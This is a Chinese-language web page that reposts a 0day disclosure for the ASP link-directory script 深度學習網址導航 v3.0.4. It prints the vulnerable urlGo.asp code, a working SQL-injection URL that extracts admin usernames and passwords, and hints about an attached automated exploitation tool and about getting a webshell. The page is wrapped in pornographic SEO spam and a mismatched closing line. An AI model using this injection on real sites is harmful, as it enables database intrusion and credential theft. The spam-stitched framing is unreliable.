六月婷婷综合激情-六月婷婷综合-六月婷婷在线观看-六月婷婷在线-亚洲黄色在线网站-亚洲黄色在线观看网站

明輝手游網中心:是一個免費提供流行視頻軟件教程、在線學習分享的學習平臺!

深度學習(asp)網址導航v3.0.4 0day

[摘要]んㄗ葑訫鎖愛'S Blog http://www.virusest.com/ 深度學習(asp)網址導航 v3.0.4 存在Sql注入漏洞 問題代碼urlGo.asp: <!...

んㄗ葑訫鎖愛'S  Blog  http://www.virusest.com/

深度學習(asp)網址導航 v3.0.4 存在Sql注入漏洞

問題代碼urlGo.asp:

<!--#include file="connDB.asp"-->

<!--#include file="include/Function.Common.asp"-->

<%

id=request.QueryString("id")

if id="" then

 response.Redirect("/")

end if

'-----網址--------------

Set rsWebUrl=Server.CreateObject("Adodb.Recordset")

sqlC="select  * from tWebUrl where fpassed=1 and fid=" & id

rsWebUrl.open sQLC,conn,0,1

if rsWebUrl.Eof and rsWebUrl.Bof then

 response.Redirect("/")

else

%>

很明顯,可以注入,而且頭文件由于程序員疏忽,很配合的沒調用防注入系統.其他文件均調用防注入.

利用:注意注入點用明小子或者啊D檢測不出來,簡單寫下注入語句:

http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin

查密碼只需把fusername改成fpassword,但是在測試的時候,發現因版本不同,可能表段長度不同,如果提示列數不匹配,則換成9個即可.

這里我寫了利用工具,傻瓜式入侵,其中,ID值為在搜索引擎中看到的ID,如圖:

工具集成了暴密碼賬號,后臺訪問,數據庫下載MD5破解等功能,工具和源碼見附件.

未加殼,歡迎篡改版權!好久沒寫程序了,就當練手吧!

Ps:后臺拿Shell比較費勁,提示空殼數據庫,先恢復在備份,再一句話!


上面是電腦上網安全的一些基礎常識,學習了安全知識,幾乎可以讓你免費電腦中毒的煩擾。




主站蜘蛛池模板: 日韩一区二区三区免费视频 | 日韩国产欧美在线观看 | 一二三四手机在线观看视频播放 | 欧美在线看片a免费观看 | 全黄性高视频 | 人人婷婷色综合五月第四人色阁 | 日本亚洲欧美 | 亚洲欧美成aⅴ人在线观看 亚洲欧美不卡 | 色综合一区二区三区 | 欧美在线中文 | 日韩精品亚洲专区在线影视 | 亚洲日韩在线视频 | 天天干夜夜操 | 欧美综合精品 | 骚妇毛片 | 台湾中文娱乐综合久久久 | 网址在线观看 | 亚洲国产日产无码精品 | 天天综合天天操 | 任我爽精品视频在线播放 | 欧美艳星nikki办公室 | 午夜短视频 | 亚洲欧洲高清 | 青青在线视频免费看观看 | 亚洲精品国产福利在线观看 | 天堂网在线新版www 天堂网在线网站成人午夜网站 | 日韩免费不卡 | 日本高清视频免费在线观看 | 天天做夜夜做 | 日本欧美一区二区三区片 | 性喷潮久久久久久久久 | 一级做a爰片 | 青青青免费观看在线视频网站 | 欧美一级片观看 | 午夜国产精品不卡在线观看 | 天天综合色网 | 先锋资源中文 | 中文字幕乱码一二三四区 | 青青热久免费精品视频网站 | 全黄色一级片 | 午夜天堂影院 |